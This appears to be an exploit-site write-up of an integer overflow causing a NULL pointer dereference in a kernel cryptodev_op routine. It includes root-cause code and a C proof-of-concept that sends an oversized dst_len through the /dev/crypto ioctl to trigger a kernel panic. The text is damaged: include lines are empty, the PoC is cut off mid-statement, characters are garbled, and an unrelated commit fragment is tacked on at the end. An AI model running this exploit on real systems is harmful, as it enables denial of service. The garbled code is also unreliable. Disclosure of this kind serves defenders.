Share
## https://sploitus.com/exploit?id=1F3A5C3D-68FA-5017-AFB4-23761FE41EBA
# NULL Dereference
The vulnerabilities found in `cryptof_ioctl` and `cryptodev_op` highlight a fundamental architectural issue: the lack of proper synchronization between session management and active crypto operations.
* **Integer overflow (leading to CWE-476):** A logic error in `cryptodev_op` allows a user-controlled unsigned value to overflow a signed integer. This causes the kernel to bypass critical memory allocations while continuing with data copies, resulting in a **NULL Pointer Dereference** and a kernel panic.
# NULL Pointer Dereference in cryptodev_op
| Field | Value |
|---|---|
| **File** | `sys/opencrypto/cryptodev.c` |
| **Function** | `cryptodev_op()` |
| **Type** | CWE-190: Integer Overflow / CWE-476: NULL Pointer Dereference |
| **Impact** | Kernel panic (DoS) |
## Root Cause
`iov_len` is declared as `int` (signed) but assigned from `cop->dst_len` which is `u_int` (unsigned). When `cop->dst_len > INT_MAX`.
```c
int iov_len = cop->len; /* signed */
if ((cse->tcomp) && cop->dst_len) {
if (iov_len dst_len)
iov_len = cop->dst_len; /* UB: u_int -> int, wraps negative */
}
/* size_t 0xffffffff80000001 */
cse->uio.uio_iov[0].iov_len = iov_len;
/* FALSE or optimized away under -O2 */
if (iov_len > 0)
cse->uio.uio_iov[0].iov_base = kmem_alloc(iov_len, KM_SLEEP);
/* corrupted: 0xffffffff80000001 */
cse->uio.uio_resid = cse->uio.uio_iov[0].iov_len;
/* iov_base = NULL -> fault */
copyin(cop->src, cse->uio.uio_iov[0].iov_base, cop->len);
```
## Trigger Conditions
| Field | Value |
|---|---|
| **Session type** | Compression session (`CRYPTO_DEFLATE_COMP` or `CRYPTO_GZIP_COMP`) |
| **`cop->dst_len`** | `> INT_MAX` (e.g. `0x80000001`) |
| **`cop->dst_len`** | `> cop->len` to trigger the `iov_len` overwrite path |
Proof-of-concept:
```c
#include
#include
#include
#include
#include
#include
#include
#include
#include
static int
open_crypto(void)
{
int fd = open("/dev/crypto", O_RDWR);
if (fd len=16 โ iov_len=16
* cop->dst_len=0x80000001 โ iov_len=0x80000001 (UB, negative as int)
* iov_len > 0 โ FALSE โ iov_base not allocated โ NULL
* uio_resid = (size_t)(negative) โ 0xffffffff80000001
* copyin(cop->src, NULL, 16) โ fault
*/
static void
bug_a_null_iov_base(void)
{
int fd = open_crypto();
uint32_t ses = make_comp_session(fd, CRYPTO_DEFLATE_COMP);
struct crypt_op cop;
uint8_t src[16], dst[16];
memset(src, 0x41, sizeof(src));
memset(&cop, 0, sizeof(cop));
cop.ses = ses;
cop.op = COP_COMP;
cop.len = 16;
cop.src = src;
cop.dst = dst;
cop.dst_len = 0x80000001; /* > INT_MAX โ iov_len goes negative */
cop.iv = NULL;
cop.mac = NULL;
if (ioctl(fd, CIOCCRYPT, &cop)
Date: Sun Mar 8 21:07:26 2026 +0000
new tzcode
```